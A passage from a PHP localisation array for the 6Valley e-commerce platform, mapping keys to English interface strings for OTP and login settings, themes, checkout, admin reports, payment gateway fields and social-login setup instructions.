you can login', 'your_account_is_ready_to_use' => 'Your account is ready to use', 'OTP_has_been_sent_again.' => 'OTP has been sent again.', 'please_wait_for_new_code.' => 'Please wait for new code.', 'Verification code/ OTP mismatched' => 'Verification code/ OTP mismatched', 'OTP_setup' => 'OTP setup', 'maximum OTP hit' => 'Maximum OTP hit', 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.' => 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.', 'OTP resend time' => 'OTP resend time', 'in_minute' => 'In minute', 'temporary_block_time' => 'Temporary block time', 'maximum Login hit' => 'Maximum Login hit', 'The maximum login hit is a measure of how many times a user can submit password within a time.' => 'The maximum login hit is a measure of how many times a user can submit password within a time.', 'temporary_login_block_time' => 'Temporary login block time', 'Settings updated!' => 'Settings updated!', 'please_try_again_after_' => 'Please try again after ', 'otp_not_found' => 'Otp not found', 'do_you_want_to_shift_in_another_theme' => 'Do you want to shift in another theme', 'if_you_shift_in_another_theme' => 'If you shift in another theme', 'everything_will_be_rearranged' => 'Everything will be rearranged', 'according_to_theme' => 'According to theme', 'too_many_attempts. please_try_again_after_' => 'Too many attempts. please try again after ', 'are_you_sure_you_want_to_delete_the_theme' => 'Are you sure you want to delete the theme', 'once_you_delete' => 'Once you delete', 'you_will_lost_the_this_theme' => 'You will lost the this theme', 'Shop_wise_with' => 'Shop wise with', 'price_comparisons' => 'Price comparisons', 'Explore_Now' => 'Explore Now', 'Most_Visited_Categories' => 'Most Visited Categories', 'Most_Searching' => 'Most Searching', 'Others_Store' => 'Others Store', 'Popular_Tags' => 'Popular Tags', 'Upcoming_Campaign' => 'Upcoming Campaign', 'All_Brands' => 'All Brands', 'All_products' => 'All products', 'Blog' => 'Blog', 'About_us' => 'About us', 'Manage_Deliveries' => 'Manage Deliveries', 'Payments' => 'Payments', 'FAQs' => 'FAQs', 'sell_on' => 'Sell on', 'Check_now' => 'Check now', 'Exclusive & Fashionable Suit For Men' => 'Exclusive & Fashionable Suit For Men', 'How_the_Setting_Works' => 'How the Setting Works', 'get_your_zip_file_from_the_purchased_theme_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'Get your zip file from the purchased theme and upload it and activate theme with your Codecanyon username and purchase code', 'now_you’ll_be_successfully_able_to_use_the_theme_for_your_6Valley_website' => 'Now you’ll be successfully able to use the theme for your 6Valley website', 'N:B you_can_upload_only_6Valley’s_theme_templates' => 'N:B you can upload only 6Valley’s theme templates', 'Got_It' => 'Got It', 'Cookie_Settings' => 'Cookie Settings', 'OTP_and_Login_Setup' => 'OTP and Login Setup', 'login_successful' => 'Login successful', 'theme_delete_successfully' => 'Theme delete successfully', 'Artificial Leather Shoes for Men by Mosharrof Shoes' => 'Artificial Leather Shoes for Men by Mosharrof Shoes', 'please_make_sure' => 'Please make sure', 'value_is_grater _or_equal_to_180M' => 'Value is grater or equal to 180M', 'current_value_is' => 'Current value is', 'your_server_php' => 'Your server php', 'value_is_grater_or_equal_to_200M' => 'Value is grater or equal to 200M', 'theme_upload_successfully!' => 'Theme upload successfully!', 'activated_successfully' => 'Activated successfully', 'activation failed' => 'Activation failed', 'Update_this_Address' => 'Update this Address', 'Invalid Order Id or Phone Number' => 'Invalid Order Id or Phone Number', 'Delivery_unavailable_in_this_country' => 'Delivery unavailable in this country', 'Order_Placed' => 'Order Placed', 'Order_Received_Notify_Seller' => 'Order Received Notify Seller', 'if_you_need_help' => 'If you need help', 'or_you_have_any_other_questions' => 'Or you have any other questions', 'feel_free_to_email_us' => 'Feel free to email us', 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs' => 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs', 'No_Product_Found' => 'No Product Found', 'no_conversation_found' => 'No conversation found', 'product compares' => 'Product compares', 'Enter_url' => 'Enter url', 'Add_Product' => 'Add Product', 'want_to_delete_this_item' => 'Want to delete this item', 'remove' => 'Remove', 'Cooking Recipe Book' => 'Cooking Recipe Book', 'Comic book pdf' => 'Comic book pdf', 'no_data_found' => 'No data found', 'generate_barcode' => 'Generate barcode', 'maximum_quantity_270' => 'Maximum quantity 270', 'print' => 'Print', 'This page is for A4 size page printer so it won t be visible in smaller devices' => 'This page is for A4 size page printer so it won t be visible in smaller devices', 'Background Music for commercial use' => 'Background Music for commercial use', 'system_setup' => 'System setup', 'Ladies Winter Long Sleeve Sweater' => 'Ladies Winter Long Sleeve Sweater', 'If the user fails to get the OTP within a certain time user can request a resend' => 'If the user fails to get the OTP within a certain time user can request a resend', 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.' => 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.', 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission' => 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission', 'account_email_not_verified' => 'Account email not verified', 'An_OTP_(One_Time_Password)_has_been_sent_to_your_email' => 'An OTP (One Time Password) has been sent to your email', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_email' => 'Please enter the OTP in the field below to verify your email', 'Email_Verification' => 'Email Verification', 'in_seconds' => 'In seconds', 'instructions' => 'Instructions', 'Employee_Update' => 'Employee Update', 'Select All' => 'Select All', 'Promotion_Management' => 'Promotion Management', 'Reports_&_Analytics' => 'Reports & Analytics', 'User_Management' => 'User Management', 'Employee Roles' => 'Employee Roles', 'search_role' => 'Search role', 'product management' => 'Product management', 'marketing section' => 'Marketing section', 'business section' => 'Business section', 'promotion management' => 'Promotion management', 'Are_you_sure_delete_this_role' => 'Are you sure delete this role', 'Role_deleted_successfully' => 'Role deleted successfully', 'Role_Update' => 'Role Update', 'Select_All' => 'Select All', 'reports_and_analytics' => 'Reports and analytics', 'Add_New_Employee' => 'Add New Employee', 'Full Name' => 'Full Name', 'Confirm Password' => 'Confirm Password', 'pos management' => 'Pos management', 'invalid_theme!' => 'Invalid theme!', 'All_Pages_Banner ' => 'All Pages Banner ', 'Product_List_Page' => 'Product List Page', 'Terms_and_Conditions' => 'Terms and Conditions', 'Banner Terms Conditions' => 'Banner Terms Conditions', 'Banner Cancellation Policy' => 'Banner Cancellation Policy', 'features_Section' => 'Features Section', 'type_your_title_text' => 'Type your title text', 'sub_Title' => 'Sub Title', 'type_your_subtitle_text' => 'Type your subtitle text', 'middle' => 'Middle', 'add_New' => 'Add New', 'bottom' => 'Bottom', 'icon_box' => 'Icon box', 'upload_Icon' => 'Upload Icon', 'value_is_grater _or_equal_to_20M' => 'Value is grater or equal to 20M', 'value_is_grater_or_equal_to_20M' => 'Value is grater or equal to 20M', 'value_is_grater _or_equal_to_20MB' => 'Value is grater or equal to 20MB', 'value_is_grater_or_equal_to_20MB' => 'Value is grater or equal to 20MB', 'your_address' => 'Your address', 'Sneakers man new design fabrics shoes with high lace up design and rubber materi' => 'Sneakers man new design fabrics shoes with high lace up design and rubber materi', 'Kevin Barr' => 'Kevin Barr', 'digital product' => 'Digital product', 'test product 1' => 'Test product 1', 'test product 2' => 'Test product 2', 'Website_Color' => 'Website Color', 'Application System' => 'Application System', 'First_Shipping' => 'First Shipping', 'First_Shipping_all_accross_the_country' => 'First Shipping all accross the country', 'Authentic_Product' => 'Authentic Product', '100%_Authentic_Products' => '100% Authentic Products', 'First_Shipping_all_across_the_country' => 'First Shipping all across the country', 'Authentic_Products' => 'Authentic Products', 'We_Ensure_Quality_Support' => 'We Ensure Quality Support', 'featured_product' => 'Featured product', 'featured_product_for_this_season' => 'Featured product for this season', 'find_your_best_featured_product' => 'Find your best featured product', 'most_demanded' => 'Most demanded', 'most_demanded_product' => 'Most demanded product', 'product_of_this_year' => 'Product of this year', 'delivery' => 'Delivery', 'wishes' => 'Wishes', 'Refer_Code' => 'Refer Code', 'use_referral_code' => 'Use referral code', 'read_more' => 'Read more', 'all_your_data_are_safe' => 'All your data are safe', 'we_are_using_the_most_advanced_security_to_provide_you_the_best_experience_ever.' => 'We are using the most advanced security to provide you the best experience ever.', 'hotline' => 'Hotline', 'ticket' => 'Ticket', 'contact_with_support_team' => 'Contact with support team', 'accounts' => 'Accounts', 'earnings' => 'Earnings', 'Refer_&_Earn' => 'Refer & Earn', 'Earn_as_Delivery_Man' => 'Earn as Delivery Man', 'Accept_All_Cookies' => 'Accept All Cookies', 'About_Our_Company' => 'About Our Company', 'All_Cart_Product_List' => 'All Cart Product List', 'want_to_clear_all_cart ' => 'Want to clear all cart ', 'Size' => 'Size', 'Totals_Cost' => 'Totals Cost', 'Apply_Coupon_Code' => 'Apply Coupon Code', 'Proceed_To_Checkout' => 'Proceed To Checkout', 'Button_Text' => 'Button Text', 'Enter_button_text' => 'Enter button text', 'Enter_banner_title' => 'Enter banner title', 'Sub_Title' => 'Sub Title', 'Enter_banner_sub_title' => 'Enter banner sub title', 'search_By_Order_Id' => 'Search By Order Id', 'search_by_Name_or_Category' => 'Search by Name or Category', 'All_Wishing_Product_List' => 'All Wishing Product List', 'Stock_Status' => 'Stock Status', 'Stock_not_available' => 'Stock not available', 'Add_to_cart' => 'Add to cart', 'Stock_Available' => 'Stock Available', 'No_Discount' => 'No Discount', 'Stock_Not_Available' => 'Stock Not Available', 'Classic Sneakers For Men' => 'Classic Sneakers For Men', 'Total_Price_For_This_Product' => 'Total Price For This Product', 'You_can_check_our' => 'You can check our', 'Ask_about_this_product' => 'Ask about this product', 'Top_Rated_Product_from_This_Store' => 'Top Rated Product from This Store', 'Similar_Product_from_This_Store' => 'Similar Product from This Store', 'You_May_Also_Like' => 'You May Also Like', 'product 50%' => 'Product 50%', 'New Digital Product' => 'New Digital Product', 'featured_Product_From_This_Store' => 'Featured Product From This Store', 'see_all' => 'See all', 'All_Product' => 'All Product', 'My_Order_Details_Delivery_Man_Info' => 'My Order Details Delivery Man Info', 'Chat_with_Delivery_man' => 'Chat with Delivery man', 'My_Order_Details_Seller_Info' => 'My Order Details Seller Info', 'Ladies Bag' => 'Ladies Bag', 'Product_Comparison' => 'Product Comparison', 'Find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'Find and select products to see the differences and similarities between them', 'Color_Variant' => 'Color Variant', 'Search_by_Name_or_Category' => 'Search by Name or Category', 'want_to_remove_compare_list_product ' => 'Want to remove compare list product ', '_Color_Available' => ' Color Available', 'no_' => 'No ', 'no_Rating' => 'No Rating', 'no_Color' => 'No Color', 'Store_List' => 'Store List', 'Search_Store' => 'Search Store', 'Static Stock Limit' => 'Static Stock Limit', 'Edit_My_Profile' => 'Edit My Profile', 'Go_Back' => 'Go Back', 'Ex:_Jhone' => 'Ex: Jhone', 'Ex:_Doe' => 'Ex: Doe', 'Enter_email_number' => 'Enter email number', 'Image_Ration_1:1' => 'Image Ration 1:1', 'NB:_Image_size_must_be_within_2_MB' => 'NB: Image size must be within 2 MB', 'Image_format_-_jpg _jpeg _png' => 'Image format - jpg jpeg png', 'Please_ReType_Password' => 'Please ReType Password', 'Passwords_do_not_match' => 'Passwords do not match', 'password_Must_Be_6_Character' => 'Password Must Be 6 Character', 'Passwords_match' => 'Passwords match', 'Physical Product' => 'Physical Product', 'Share' => 'Share', 'women s shoes' => 'Women s shoes', 'update_product' => 'Update product', '3USB Head Phone' => '3USB Head Phone', 'Running Shoes' => 'Running Shoes', 'search_by_brands' => 'Search by brands', 'Payment_History' => 'Payment History', 'Loyalty Point' => 'Loyalty Point', 'Add_New_Card' => 'Add New Card', 'Item_has_been_removed_from_cart ' => 'Item has been removed from cart ', 'Start_From' => 'Start From', 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li' => 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li', 'checkout_details' => 'Checkout details', 'Set_from_map' => 'Set from map', 'Set_Delivery_Address' => 'Set Delivery Address', 'Proceed_To_Next' => 'Proceed To Next', 'Fill_all_required_fields_of_shipping_address' => 'Fill all required fields of shipping address', 'Select_Payment_Method' => 'Select Payment Method', 'Cash_On_Delivery' => 'Cash On Delivery', 'Please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'Please contact with deliveryman to confirm your pay and receive your order.', 'Please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'Please confirm your verified account to pay through your bank account', 'Pay_with_secure_Digital_payment_gateways' => 'Pay with secure Digital payment gateways', 'order_complete' => 'Order complete', 'Thank_you_for_your_order!_Your_order_is_being_processed_and_will_be_completed_within_3-6 hours._You_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'Thank you for your order! Your order is being processed and will be completed within 3-6 hours. You will receive an email confirmation when your order is completed.', 'My_Order_Details_Track_Order' => 'My Order Details Track Order', 'Order_delivered' => 'Order delivered', 'Enter_your_order_ID_& _phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'Track_Order_Result' => 'Track Order Result', 'add_Address' => 'Add Address', 'Ex:_01XXXXXX' => 'Ex: 01XXXXXX', 'Enter_Your_City' => 'Enter Your City', 'Enter_Your_zip_code' => 'Enter Your zip code', 'Women s long-sleeve lightweight french terry fleece quarter-zip top' => 'Women s long-sleeve lightweight french terry fleece quarter-zip top', 'Earn_money _o_your_wallet_by_completingthe_offer_&_challenged' => 'Earn money o your wallet by completingthe offer & challenged', 'Total_Point' => 'Total Point', 'Minimum_' => 'Minimum ', '_points_required_to_convert_into_currency' => ' points required to convert into currency', 'Convert_to_Currency' => 'Convert to Currency', 'Point_Transaction_History' => 'Point Transaction History', 'Support_Ticket_Inbox' => 'Support Ticket Inbox', 'start_typing...' => 'Start typing...', 'brand_List' => 'Brand List', 'search_Brands' => 'Search Brands', 'clear' => 'Clear', 'Flash Sale for Any Item' => 'Flash Sale for Any Item', 'Flash Deals' => 'Flash Deals', 'ecommerce' => 'Ecommerce', 'Address_Type' => 'Address Type', 'Become_a_Seller' => 'Become a Seller', 'offers' => 'Offers', 'featured_Deal' => 'Featured Deal', 'login_to_your_account.' => 'Login to your account.', 'login_to_your_seller_account.' => 'Login to your seller account.', 'no_thanks' => 'No thanks', 'yes_i_Accept' => 'Yes i Accept', 'page_Not_found' => 'Page Not found', 'we_are_sorry' => 'We are sorry', 'the_page_you_requested_could_not_be_found' => 'The page you requested could not be found', 'please_go_back_to_the_homepage' => 'Please go back to the homepage', 'Order_Complete' => 'Order Complete', 'your_order_is_being_processed_and_will_be_completed_within_3-6_hours.' => 'Your order is being processed and will be completed within 3-6 hours.', 'you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'You will receive an email confirmation when your order is completed.', 'My_profile' => 'My profile', 'Show_Order' => 'Show Order', 'Shipping_Fee' => 'Shipping Fee', 'Discount_on_product' => 'Discount on product', 'Sorry_Out_of_stock' => 'Sorry Out of stock', 'Type_your_message' => 'Type your message', 'Choose_Option' => 'Choose Option', 'Online_Shopping' => 'Online Shopping', 'Just_reorder_from_your_previous_orders.' => 'Just reorder from your previous orders.', 'Do_not_Miss_Todays_Deal' => 'Do not Miss Todays Deal', 'Let_us_Shopping_Today' => 'Let us Shopping Today', 'welcome_message' => 'Welcome message', 'overall_statistics' => 'Overall statistics', 'todays_Statistics' => 'Todays Statistics', 'this_Months_Statistics' => 'This Months Statistics', 'total_Sale' => 'Total Sale', 'total_Stores' => 'Total Stores', 'total_Products' => 'Total Products', 'total_Customers' => 'Total Customers', 'failed_to_delivery' => 'Failed to delivery', 'this_Year' => 'This Year', 'this_Month' => 'This Month', 'this_Week' => 'This Week', 'in-house' => 'In-house', 'most_Popular_Stores' => 'Most Popular Stores', 'top_Delivery_Man' => 'Top Delivery Man', 'do_you_want_to_logout' => 'Do you want to logout', 'failed_to_Deliver' => 'Failed to Deliver', 'refund_Requests' => 'Refund Requests', 'category_Setup' => 'Category Setup', 'sub_Categories' => 'Sub Categories', 'sub_Sub_Categories' => 'Sub Sub Categories', 'product_Attributes' => 'Product Attributes', 'in-Hous_Products' => 'In-Hous Products', 'in-house_Products' => 'In-house Products', 'seller_Products' => 'Seller Products', 'new_Products' => 'New Products', 'approved_Products' => 'Approved Products', 'denied_Products' => 'Denied Products', 'offers_&_Deals' => 'Offers & Deals', 'flash_Deals' => 'Flash Deals', 'push_Notification' => 'Push Notification', 'support_Ticket' => 'Support Ticket', 'reports_&_Analysis' => 'Reports & Analysis', 'sales_&_Transaction_Report' => 'Sales & Transaction Report', 'inhouse_Sales' => 'Inhouse Sales', 'seller_Sales' => 'Seller Sales', 'transaction_Report' => 'Transaction Report', 'product_Report' => 'Product Report', 'order_Report' => 'Order Report', 'customer_List' => 'Customer List', 'customer_Reviews' => 'Customer Reviews', 'loyalty_Points' => 'Loyalty Points', 'add_New_Seller' => 'Add New Seller', 'seller_List' => 'Seller List', 'withdrawal_Methods' => 'Withdrawal Methods', 'employee_Role_Setup' => 'Employee Role Setup', 'system_Settings' => 'System Settings', 'business_Setup' => 'Business Setup', 'social_Media_Links' => 'Social Media Links', 'system_Setup' => 'System Setup', 'software_version' => 'Software version', 'ready_to_Leave' => 'Ready to Leave', 'Select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'Select Logout below if you are ready to end your current session', 'you_have_new_order' => 'You have new order', 'check_please' => 'Check please', 'let_me_check' => 'Let me check', 'are_you_sure' => 'Are you sure', 'update_option_is_disabled_for_demo' => 'Update option is disabled for demo', 'order_List' => 'Order List', 'select_Date_Range' => 'Select Date Range', 'in_House' => 'In House', 'start_Date' => 'Start Date', 'end_Date' => 'End Date', 'show_data' => 'Show data', 'failed_To_Delivery' => 'Failed To Delivery', 'search_by_Order_ID' => 'Search by Order ID', 'order_Date' => 'Order Date', 'total_Amount' => 'Total Amount', 'order_Status' => 'Order Status', 'invalid_date_range' => 'Invalid date range', 'coupon_Add' => 'Coupon Add', 'select_coupon_type' => 'Select coupon type', 'discount_on_Purchase' => 'Discount on Purchase', 'free_Delivery' => 'Free Delivery', 'first_Order' => 'First Order', 'ex' => 'Ex', 'select_coupon_bearer' => 'Select coupon bearer', 'limit_for_same_user' => 'Limit for same user', 'discount_Amount' => 'Discount Amount', 'search_by_Title_or_Code_or_Discount_Type' => 'Search by Title or Code or Discount Type', 'used' => 'Used', 'Coupon_added_successfully' => 'Coupon added successfully', 'coupon_Edit' => 'Coupon Edit', 'select_Coupon_Type' => 'Select Coupon Type', 'order_Details' => 'Order Details', 'print_Invoice' => 'Print Invoice', 'payment_Method' => 'Payment Method', 'payment_Status' => 'Payment Status', 'item Details' => 'Item Details', 'variations' => 'Variations', 'order_&_Shipping_Info' => 'Order & Shipping Info', 'shipping_Method' => 'Shipping Method', 'Company Vehicle' => 'Company Vehicle', 'customer_information' => 'Customer information', 'contact' => 'Contact', 'shop_Information' => 'Shop Information', 'orders_Served' => 'Orders Served', 'location_Data' => 'Location Data', 'you_will_not_be_able_to_revert_this' => 'You will not be able to revert this', 'yes_change_it' => 'Yes change it', 'account_has_been_deleted_you_can_not_change_the_status' => 'Account has been deleted you can not change the status', 'status_change_successfully' => 'Status change successfully', 'order_is_already_delivered_you_can_not_change_it' => 'Order is already delivered you can not change it', 'before_delivered_you_need_to_make_payment_status_paid' => 'Before delivered you need to make payment status paid', 'delivery_man_successfully_assigned_or_changed' => 'Delivery man successfully assigned or changed', 'deliveryman_man_can_not_assign_or_change_in_that_status' => 'Deliveryman man can not assign or change in that status', 'add_valid_data' => 'Add valid data', 'only_available_when_order_is_out_for_delivery' => 'Only available when order is out for delivery', 'deliveryman_charge_add_successfully' => 'Deliveryman charge add successfully', 'failed_to_add_deliveryman_charge' => 'Failed to add deliveryman charge', 'this_shop_is_temporary_closed_or_on_vacation.' => 'This shop is temporary closed or on vacation.', 'You_cannot_add_product_to_cart_from_this_shop_for_now' => 'You cannot add product to cart from this shop for now', 'admin_or_Employee_Login' => 'Admin or Employee Login', '8+_characters_required' => '8+ characters required', 'please_check_the_recaptcha' => 'Please check the recaptcha', 'coupon_bearer_is_required' => 'Coupon bearer is required', 'select_seller_is_required' => 'Select seller is required', 'select_customer_is_required' => 'Select customer is required', 'limit_for_same_user_is_required' => 'Limit for same user is required', 'discount_type_is_required' => 'Discount type is required', 'discount_amount_is_required' => 'Discount amount is required', 'minimum_purchase_is_required' => 'Minimum purchase is required', 'Coupon_updated_successfully' => 'Coupon updated successfully', 'address_not_found' => 'Address not found', 'Delivery_unavailable_for_this_country' => 'Delivery unavailable for this country', 'app_Settings' => 'App Settings', 'in-House_Shop' => 'In-House Shop', 'delivery_Restriction' => 'Delivery Restriction', 'cookie_Settings' => 'Cookie Settings', 'by_turning_on_maintaince_mode _all_your_app_and_customer_side_website_will_be_off._Only_admin_panel_and_seller_panel_will_be_functional' => 'By turning on maintaince mode all your app and customer side website will be off. Only admin panel and seller panel will be functional', 'company_Information' => 'Company Information', 'company_Name' => 'Company Name', 'your_shop_address' => 'Your shop address', 'time_zone' => 'Time zone', 'currency_Position' => 'Currency Position', 'left' => 'Left', 'right' => 'Right', 'email_verification' => 'Email verification', 'pagination_settings' => 'Pagination settings', 'website_Color' => 'Website Color', 'primary_Color' => 'Primary Color', 'secondary_Color' => 'Secondary Color', 'primary_Light_Color' => 'Primary Light Color', 'website_Header_Logo' => 'Website Header Logo', 'choose_File' => 'Choose File', 'website_Footer_Logo' => 'Website Footer Logo', 'website_Favicon' => 'Website Favicon', 'loading_Gif' => 'Loading Gif', 'be_careful_before_you_turn_on/off_maintenance_mode' => 'Be careful before you turn on/off maintenance mode', 'both_Phone_&_Email_verification_can_not_be_active_at_a_time' => 'Both Phone & Email verification can not be active at a time', 'order_Settings' => 'Order Settings', 'show_Billing_Address_In_Checkout' => 'Show Billing Address In Checkout', 'please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'Please make sure all the product s delivery charges are up to date.', '4_to_6_days' => '4 to 6 days', 'shipping_responsibility_updated_successfully' => 'Shipping responsibility updated successfully', 'shipping_method_updated_successfully' => 'Shipping method updated successfully', 'order_wise_shipping_method_Status_updated_successfully' => 'Order wise shipping method Status updated successfully', 'are_you_sure_delete_this' => 'Are you sure delete this', 'yes_delete_it' => 'Yes delete it', 'Order_Wise_Shipping_Method_deleted_successfully' => 'Order Wise Shipping Method deleted successfully', 'no_delivery_man_assigned_yet' => 'No delivery man assigned yet', 'SMS_Module_Setup' => 'SMS Module Setup', 'EX_of_SMS_providers_template_:_your_OTP_is_XXXX_here_please_check' => 'EX of SMS providers template : your OTP is XXXX here please check', 'NB_:_XXXX_will_be_replace_with_otp' => 'NB : XXXX will be replace with otp', 'NB_:_Keep_an_OTP_variable_in_your_SMS_providers_OTP_Template' => 'NB : Keep an OTP variable in your SMS providers OTP Template', 'auth_key' => 'Auth key', 'mail_Config' => 'Mail Config', 'test_your_email_integration' => 'Test your email integration', 'mail' => 'Mail', 'send_mail' => 'Send mail', 'host' => 'Host', 'driver' => 'Driver', 'encryption' => 'Encryption', 'a_test_mail_will_be_sent_to_your_email' => 'A test mail will be sent to your email', 'email_configuration_error' => 'Email configuration error', 'email_configured_perfectly' => 'Email configured perfectly', 'email_status_is_not_active' => 'Email status is not active', 'invalid_email_address' => 'Invalid email address', 'store_ID' => 'Store ID', 'store_password' => 'Store password', 'Paypal_Client_ID' => 'Paypal Client ID', 'paypal_Secret' => 'Paypal Secret', 'callback_URI' => 'Callback URI', 'copy_URI' => 'Copy URI', 'secret_key' => 'Secret key', 'merchant_ID' => 'Merchant ID', 'public_Key' => 'Public Key', 'secret_Key' => 'Secret Key', 'payment_Url' => 'Payment Url', 'merchant_Email' => 'Merchant Email', 'private_Key' => 'Private Key', 'Copied_to_the_clipboard' => 'Copied to the clipboard', 'reference_Code' => 'Reference Code', 'payment_Note' => 'Payment Note', 'main_Banner' => 'Main Banner', 'footer_Banner' => 'Footer Banner', 'popup_Banner' => 'Popup Banner', 'main_Section_Banner' => 'Main Section Banner', 'header_Banner' => 'Header Banner', 'sidebar_Banner' => 'Sidebar Banner', 'top_Side_Banner' => 'Top Side Banner', 'search_by_Banner_Type' => 'Search by Banner Type', 'banner_published_successfully' => 'Banner published successfully', 'banner_unpublished_successfully' => 'Banner unpublished successfully', 'are_you_sure_delete_this_banner' => 'Are you sure delete this banner', 'banner_deleted_successfully' => 'Banner deleted successfully', 'deal_Of_The_Day' => 'Deal Of The Day', 'select_Product' => 'Select Product', 'search_by_Title' => 'Search by Title', 'social_Login' => 'Social Login', 'store_Client_ID' => 'Store Client ID', 'store_Client_Secret_Key' => 'Store Client Secret Key', 'see_Credential_Setup_Instructions' => 'See Credential Setup Instructions', 'google_API_Set_up_Instructions' => 'Google API Set up Instructions', 'Go_to_the_Credentials_page' => 'Go to the Credentials page', 'create_credentials' => 'Create credentials', 'OAuth_client_ID' => 'OAuth client ID', 'select_the' => 'Select the', 'web_application' => 'Web application', 'ADD_URI' => 'ADD URI', 'authorized_redirect_URIs' => 'Authorized redirect URIs', 'provide_the' => 'Provide the', 'from_below_and_click' => 'From below and click', 'create' => 'Create', 'client_Secret' => 'Client Secret', 'paste_in_the_input_filed_below_and' => 'Paste in the input filed below and', 'facebook_API_Set_up_Instructions' => 'Facebook API Set up Instructions', 'go_to_the_facebook_developer_page' => 'Go to the facebook developer page', 'get_started' => 'Get started', 'from_Navbar' => 'From Navbar', 'from_Register_tab_press' => 'From Register tab press', 'continue' => 'Continue', 'if_needed' => 'If needed', 'provide_Primary_Email_and_press' => 'Provide Primary Email and press', 'confirm_Email' => 'Confirm Email', 'in_about_section_select' => 'In about section select', 'other' => 'Other', 'and_press' => 'And press', 'complete_Registration' => 'Complete Registration', 'create_App' => 'Create App', 'select_an_app_type_and_press' => 'Select an app type and press', 'next' => 'Next', 'complete_the_add_details_form_and_press' => 'Complete the add details form and press', 'facebook_Login' => 'Facebook Login', 'set_Up' => 'Set Up', 'web' => 'Web', 'site_URL' => 'Site URL', 'base_URL_of_the_site_ex:' => 'Base URL of the site ex:', 'now_go_to' => 'Now go to', 'setting' => 'Setting', 'make_sure_to_check' => 'Make sure to check', 'client_OAuth_Login' => 'Client OAuth Login', 'must_on' => 'Must on', 'valid_OAuth_Redirect_URIs' => 'Valid OAuth Redirect URIs', 'save_Changes' => 'Save Changes', 'from_left_sidebar' => 'From left sidebar', 'basic' => 'Basic', 'fill_the_form_and_press' => 'Fill the form and press', 'now_copy' => 'Now copy', 'client_ID' => 'Client ID', '&' => '&', 'twitter_API_Set_up_Instructions' => 'Twitter API Set up Instructions', 'instruction_will_be_available_very_soon' => 'Instruction will be available very soon', 'copied_to_the_clipboard' => 'Copied to the clipboard', 'environment_Information' => 'Environment Information', 'true' => 'True', 'false' => 'False', 'dev' => 'Dev', 'default_status' => 'Default status', 'are_you_sure_to_delete_this' => 'Are you sure to delete this', 'Yes_delete_it' => 'Yes delete it', 'default_language_can_not_be_deleted' => 'Default language can not be deleted', 'to_delete_change_the_default_language_first' => 'To delete change the default language first', 'Do_not_Logout' => 'Do not Logout', 'messages.apple' => 'Messages.apple', 'Login Turned ON ' => 'Login Turned ON ', 'Login Turned OFF ' => 'Login Turned OFF ', 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.' => 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.', 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.' => 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.', 'Credential Setup' => 'Credential Setup', 'messages.client_id' => 'Messages.client id', 'messages.team_id' => 'Messages.team id', 'messages.key_id' => 'Messages.key id', 'messages.service_file' => 'Messages.service file', '(Already Exists)' => '(Already Exists)', 'messages.save' => 'Messages.save', 'messages.apple_api_set_instruction' => 'Messages.apple api set instruction', 'Go to Apple Developer page' => 'Go to Apple Developer page', 'messages.click_here' => 'Messages.click here', 'Here in top left corner you can see the' => 'Here in top left corner you can see the', 'Team ID' => 'Team ID', '[Apple_Deveveloper_Account_Name - Team_ID]' => '[Apple Deveveloper Account Name - Team ID]', 'Click Plus icon - select App IDs - click on Continue' => 'Click Plus icon - select App IDs - click on Continue', 'Put a description and also identifier (identifier that used for app) and this is the' => 'Put a description and also identifier (identifier that used for app) and this is the', 'Click Continue and Download the file in device named AuthKey_ID.p8 (Store it safely and it is used for push notification)' => 'Click Continue and Download the file in device named AuthKey ID.p8 (Store it safely and it is used for push notification)', 'Again click Plus icon - select Service IDs - click on Continue' => 'Again click Plus icon - select Service IDs - click on Continue', 'Push a description and also identifier and Continue' => 'Push a description and also identifier and Continue', 'Download the file in device named' => 'Download the file in device named', 'AuthKey_KeyID.p8' => 'AuthKey KeyID.p8', '[This is the Service Key ID file and also after AuthKey_ that is the Key ID]' => '[This is the Service Key ID file and also after AuthKey that is the Key ID]', 'Got It' => 'Got It', 'apple' => 'Apple', 'team_id' => 'Team id', 'key_id' => 'Key id', 'go_to_apple_developer_page' => 'Go to apple developer page', 'here_in_top__left_corner_you_can_see_the' => 'Here in top left corner you can see the', 'team_ID' => 'Team ID', 'apple_developer_account_name' => 'Apple developer account name', 'click_plus_icon' => 'Click plus icon', 'select_app_IDs' => 'Select app IDs', 'click_on_continue' => 'Click on continue', 'put_a_description_and_also_identifier_(identifier that used for app)_and_this_is_the' => 'Put a description and also identifier (identifier that used for app) and this is the', 'click_continue_and_download_the_file_in_device_named_AuthKey_ID.p8_(store_it_safely_and_it_is_used_for_push_notification)' => 'Click continue and download the file in device named AuthKey ID.p8 (store it safely and it is used for push notification)', 'again_click_plus_icon' => 'Again click plus icon', 'select_service_IDs' => 'Select service IDs', 'download_the_file_in_device_named' => 'Download the file in device named', 'this_is_the_service_key_ID_file_and_also_after_AuthKey_that_is_the_key_ID' => 'This is the service key ID file and also after AuthKey that is the key ID', 'google_credentials_updated' => 'Google credentials updated', 